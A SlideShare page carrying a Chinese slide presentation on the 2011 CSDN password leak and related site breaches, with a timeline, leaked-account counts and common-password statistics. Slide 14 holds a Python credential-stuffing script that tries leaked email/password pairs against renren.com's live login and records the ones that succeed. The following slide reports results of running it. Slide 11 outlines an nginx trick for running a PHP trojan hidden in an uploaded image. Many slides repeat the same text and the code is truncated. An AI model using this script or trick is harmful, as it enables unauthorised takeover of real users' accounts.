Suche senden
Hochladen
csdn 密码泄露
•
0 gefällt mir
•
1,525 views
Qing Liu
Folgen
csdn 密码泄露等一系列网站密码泄露问题
Weniger lesen
Mehr lesen
Bildung
Melden
Teilen
Melden
Teilen
1 von 34
Jetzt herunterladen
Downloaden Sie, um offline zu lesen
Empfohlen
Openthology256pub
Openthology256pub
Keiichi SASAKI
Журнал "ЖКГ України", квітень 2009
Журнал "ЖКГ України", квітень 2009
Журнал "ЖКГ України
Szansa na pracę i rozwój
Szansa na pracę i rozwój
madzia88
Ch25
Ch25
sivabiotechnica
Katalogi kultury, furtki dla otwartości
Katalogi kultury, furtki dla otwartości
Alek Tarkowski
Koşulleleri
Koşulleleri
massive501
Build milwaukee
Build milwaukee
EdwardforMayor
Photos
Photos
AlexBoldin
Weitere ähnliche Inhalte
Ähnlich wie csdn 密码泄露
《氪月报》2011年12月
《氪月报》2011年12月
Chada Chiu
機密圖檔與敏感資料庫資料防洩漏方案
機密圖檔與敏感資料庫資料防洩漏方案
道成資訊股份有限公司
270 隐私云个人版
270 隐私云个人版
Rui (Nash) Yang
Qq game后台架构及开发介绍
Qq game后台架构及开发介绍
mysqlops
Security threatsandtrends michaelsentonas
Security threatsandtrends michaelsentonas
ITband
Spirent_securityLab-服務介紹_2022.pdf
Spirent_securityLab-服務介紹_2022.pdf
ssuserdfa916
密碼安全與策略 - 2023年當代狀況.pdf
密碼安全與策略 - 2023年當代狀況.pdf
Shoichi Chou
HITCON CMT 2017 - ZeroDay 發表會
HITCON CMT 2017 - ZeroDay 發表會
Chris Lin
20181120 NISRA - 密碼學沒有入門
20181120 NISRA - 密碼學沒有入門
Chao An Hsiao
郭憲誌/迎戰駭客攻擊,打造企業資安堡壘
郭憲誌/迎戰駭客攻擊,打造企業資安堡壘
ChungSC_tw
電腦網路 網路安全
電腦網路 網路安全
bruce761207
網路安全
網路安全
bruce761207
Internet Security
Internet Security
bruce761207
網路安全
網路安全
bruce761207
資訊證照講座
資訊證照講座
Ryan Chung
Ähnlich wie csdn 密码泄露
(15)
《氪月报》2011年12月
《氪月报》2011年12月
機密圖檔與敏感資料庫資料防洩漏方案
機密圖檔與敏感資料庫資料防洩漏方案
270 隐私云个人版
270 隐私云个人版
Qq game后台架构及开发介绍
Qq game后台架构及开发介绍
Security threatsandtrends michaelsentonas
Security threatsandtrends michaelsentonas
Spirent_securityLab-服務介紹_2022.pdf
Spirent_securityLab-服務介紹_2022.pdf
密碼安全與策略 - 2023年當代狀況.pdf
密碼安全與策略 - 2023年當代狀況.pdf
HITCON CMT 2017 - ZeroDay 發表會
HITCON CMT 2017 - ZeroDay 發表會
20181120 NISRA - 密碼學沒有入門
20181120 NISRA - 密碼學沒有入門
郭憲誌/迎戰駭客攻擊,打造企業資安堡壘
郭憲誌/迎戰駭客攻擊,打造企業資安堡壘
電腦網路 網路安全
電腦網路 網路安全
網路安全
網路安全
Internet Security
Internet Security
網路安全
網路安全
資訊證照講座
資訊證照講座
csdn 密码泄露
1.
. .
关注密码泄露事件 12.31.2011 logo . . . . . . 关注密码泄露事件
2.
. 事件起因:CSDN 密码泄露
. 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
3.
. 事件起因:CSDN 密码泄露
. 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
4.
. 事件起因:CSDN 密码泄露
. 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
5.
. 事件起因:CSDN 密码泄露
. 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
6.
. 事件起因:CSDN 密码泄露
. 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
7.
. 事件起因:CSDN 密码泄露
. 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
8.
. 事件起因:CSDN 密码泄露
. 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
9.
. 事件起因:CSDN 密码泄露
. 事件经过 . 12 月 21 日: 360 安全卫士官方微博发布了一条紧急通知, 称 CSDN 网站 600 余万用户数据库泄密 12 月 23 日: 经过确认 CSDN 泄露, 多玩泄露, 梦幻西游帐 户通过木马泄露, 人人网部分泄露 12 月 23 日: 天涯沦陷...7K7K 包中包含天涯帐户密码! 12 月 24 日: 178 沦陷 UUU9 沦陷事态蔓延. 12 月 24 日 15:30: 天涯全面沦陷泄露多达 900W 帐户信息 12 月 25 日: 事态升级天涯疑泄露 4000W 用户资料 12 月 27 日:178.com 彻底沦陷,共计泄露超出 1100W+ 数 据! 12 月 28 日,多所大学数据库信息泄露 . logo . . . . . . 关注密码泄露事件
10.
. 密码泄露情况
CSDN 6,428,632 个帐号 帐号, 明文密码, 电子邮件 多玩 8,305,005 个帐号 帐号, 加密密码, 部分明文密码等 178.COM 1,883,487 增加中 帐号, 加密密码, 全部明文密码等 天涯 4000W+ 账号 帐号, 明文密码, 电子邮件 人人网 4,768,600 个帐号 明文密码, 电子邮件 梦幻西游 约 1.4G(木马盗取) 帐号, 邮箱, 明文密码等 微博 未知个帐号 邮箱, 明文密码 当当网 10 万用户资料 真实姓名、电子邮件等个人信息 凡客 20 万用户资料 真实姓名、电子邮件等个人信息 卓越 20 万用户资料 真实姓名、电子邮件等个人信息 ··· ········· ········· logo . . . . . . 关注密码泄露事件
11.
. 密码泄露原因及猜测
. 以 CSDN 为代表的明文保存密码 . 2009 年 11 月之前是明文,2009 年 11 月之后是加密的,但部分 明文密码未清理,2011 年 5 月 12 日清理掉了所有明文密码。所 以从 2011 年 5 月 12 日开始全部都是安全的,5 月 12 日之前的 有可能不安全。 . . nginx web 服务器漏洞 . 对用户开放上传图片权限造成的。黑客可以通过在图片后附加一 段 PHP 木马脚本上传,然后利用 nginx 的漏洞执行该脚本(然 后输入/scripts/80sec.jpg/80sec.php 以 php 进行解析) . 。 . 木马 . 多 . 玩网、梦幻西游账户通过木马泄露 . 另一个大胆猜测 . logo 众多网站同类后门被发现! . . . . . . . 关注密码泄露事件
12.
. 完全密码统计 (摘自网上:最多使用的密码)
rank 密码 次数 rank 密码 次数 1 123456 4,138,464 11 123321 183,741 2 123456789 1,070,028 12 666666 134,599 3 111111 1,033,040 13 1234567 127,268 4 123123 471,036 14 111222tianya 116,015 5 000000 428,307 15 7758521 115,560 6 12345678 409,722 16 1314520 115,227 7 wodima123 392,869 17 888888 110,647 8 5201314 298,458 18 a321654 106,441 9 a123456 195,049 19 654321 100,137 10 11111111 186,429 20 woaini 99,977 logo . . . . . . 关注密码泄露事件
13.
. CSDN 密码统计
(摘自网上:密码组成) . 按字符类型(数字,小写字母,大写字母,其他符号) . 字符种类数 1 2 3 4 密码个数 3,667,174 2,512,212 234,712 14,268 . 比例 57.05% 39.08% 3.65% 0.22% . 按字符长度 . 密码长度 1-7 位 8-11 位 12-15 位 16 位及以上 密码个数 141,264 4,810,335 1,393,025 83,742 . 比例 2.20% 74.83% 21.67% 1.30% logo . . . . . . 关注密码泄露事件
14.
. 密码真实性验证(自己动手,丰衣足食)
for uline in ulines: count=count+1 usps = uline.split() email = usps[0] password = usps[1] myCookie = urllib2.HTTPCookieProcessor(cookielib.CookieJar() openner = urllib2.build_opener(myCookie) post_data = {'email':email,'password':password,'origURL':'ht #post_data = {'username':email,'password':password,'origURL' req = urllib2.Request('http://www.renren.com/PLogin.do', url html_src = openner.open(req).read() if html_src.find(' 没有更多新鲜事了')==-1: print count,email,password,"failn" else: print count,email,password,"success !!!n" str_cr=usps[0]+' '+usps[1]+'n' logo fcrack.write(str_cr) . . . . . . 关注密码泄露事件
15.
. 实验结果(自己动手,丰衣足食)
logo . . . . . . 关注密码泄露事件
16.
CSDN 密码类型与平均长度统计(自己动手,丰衣足 . 食)
logo . . . . . . 关注密码泄露事件
17.
CSDN 密码类型与平均长度统计(自己动手,丰衣足 . 食)
logo . . . . . . 关注密码泄露事件
18.
. CSDN 程序猿最喜爱的密码(自己动手,丰衣足食)
1qaz2wsx 3667 11223344 4096 a123456789 4435 66666666 5025 1111111111 5145 aaaaaaaa 5460 987654321 5553 147258369 5966 111111111 6995 88888888 15033 1234567890 17791 123123123 19986 00000000 34952 dearbook 46053 11111111 76346 12345678 212751 logo 123456789 235032 . . . . . . 关注密码泄露事件
19.
. CSDN 邮箱类型统计(自己动手,丰衣足食)
logo . . . . . . 关注密码泄露事件
20.
. CSDN 邮箱类型统计(自己动手,丰衣足食)
logo . . . . . . 关注密码泄露事件
21.
. K7K7 密码长度统计(自己动手,丰衣足食)
logo . . . . . . 关注密码泄露事件
22.
. K7K7 密码长度统计(自己动手,丰衣足食)
logo . . . . . . 关注密码泄露事件
23.
. k7k7 群众最喜欢的密码(自己动手,丰衣足食)
112233 4844 woaini 5714 1234567 6228 666666 6358 1314520 6592 11111111 7860 7758521 7900 123321 11080 123 11527 12345678 13856 wangyut2 17016 5201314 21744 123123 39173 123456789 40035 0 50952 111111 74182 logo 123456 256310 . . . . . . 关注密码泄露事件
24.
. 为什么密码泄露这么严重而广泛?
. CSDN 创始人蒋涛对此发表了评价 . . 1 某上市公司忙着造假库往外扔,栽赃其他公司,想摆脱被曝 明文库的证据 . 2 有网站通知所有用户改密码,乘机激活用户 3. 还有网站把这些公开库的数据直接导入自己用户库,也发通 知给用户改密码 . 4 钓鱼的垃圾邮件的都活跃起来了 . . 肇事者 === 水很深啊 . . 1 向微博实名制的挑衅 . 2 黑客行为,够呛 3. 安全厂商行为(金山,天涯快压) . 4 蝴蝶效应。 . logo . . . . . . 关注密码泄露事件
25.
Happy New Year!!!
. . . . . .
26.
Happy New Year!!!
. . . . . .
27.
Happy New Year!!!
. . . . . .
28.
Happy New Year!!!
. . . . . .
29.
Happy New Year!!!
. . . . . .
30.
Happy New Year!!!
. . . . . .
31.
Happy New Year!!!
. . . . . .
32.
Happy New Year!!!
. . . . . .
33.
Happy New Year!!!
. . . . . .
34.
Happy New Year!!!
. . . . . .
Jetzt herunterladen